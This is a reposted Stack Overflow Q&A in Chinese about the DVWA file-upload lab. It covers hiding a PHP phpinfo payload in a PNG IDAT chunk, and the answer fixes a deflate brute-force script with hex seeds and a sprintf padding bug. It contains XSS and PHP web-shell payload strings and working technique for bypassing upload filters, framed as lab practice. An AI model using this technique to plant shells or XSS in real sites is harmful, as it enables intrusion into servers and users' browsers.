gpt4 book ai didi

PNG 的 IDAT block 上的 PHP shell

转载 作者:行者123 更新时间:2023-12-05 05:17:27 25 4
gpt4 key购买 nike

我正在研究有关文件上传高漏洞的 DVWA。我想绕过过滤器,它只允许上传 jpg 或 png 等图像。所以我打算嵌入有效载荷 <?=phpinfo();图像文件。经过搜索,我发现了这些很棒的博客:

  1. An XSS on Facebook via PNGs & Wonky Content Types
  2. Encoding Web Shells in PNG IDAT chunks
  3. Revisiting XSS payloads in PNG IDAT chunks

我懒得研究 Deflate 算法和搜索 png shell generator 并找到了这个很棒的存储库:

  1. PNG Payload Generator with PERL

克隆并运行后,效果很好。但有效载荷是针对 XSS 漏洞 output here :

<SCRIPT SRC=//ABC.DE></SCRIPT>

我想完成 DVWA 的目标。它说

Execute any PHP function of your choosing on the target system (such as phpinfo() or system()) thanks to this file upload vulnerability.

所以,我想要的有效载荷是:<?=phpinfo();?>嵌入 PNG 的 IDAT block 中,此有效负载从 IDAT 上的过滤器和压缩中幸存下来。从存储库中,我找到了 f1n1te/idontplaydarts 博客之前描述的 bruteforce() 逻辑。我复制了源代码并尝试用我的有效负载进行爆破压缩 here但在符号字符上失败。基于源/生成器,我有 2 个问题:

  1. 为什么在 the source ,暴力破解符号“<”和“?”以及另一个 ascii 符号?但它适用于 ascii“a-z”和“A-Z”。
  2. 在我发现的 3 个博客和 1 个存储库中,它们使用此有效载荷来暴力破解 Deflate:

    7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f - f1n1te f399281922111510691928276e6e562e2c1e581b1f576e69b16375535b6f0e7f - 亚当 03a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310 - idontplaydarts 0000f399281922111510691928276e6e5313241e1f576e69b16375535b6f0000 - 存储库

这些家伙如何将所有这些有效载荷用于暴力破解 Deflate Compression

最佳答案

暴力破解失败是因为它太短了。您需要 5 个半字节,而不仅仅是 4 个。我用箭头标记了额外的数字。

0000f399281922111510691928276e6e....1f576e69b16375535b6f0000 your template
0000f399281922111510691928276e6e51121f576e69b16375535b6f0000 "x\234c`\370<SCRIPT SRC=//PH></script>\3\3\0w\314\10)"
0000f399281922111510691928276e6e576f5f576e69b16375535b6f0000 "x\234c`\370<SCRIPT SRC=//<?></script>\3\3\0w\314\10)"

该程序还包含一个错误,阻止它完全耗尽搜索空间。 sprintf 的格式说明符必须用零填充,否则十六进制数字字符串太短;换句话说,在原始程序中它必须是 %04x,而不是 %x

关于PNG 的 IDAT block 上的 PHP shell,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/49144776/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com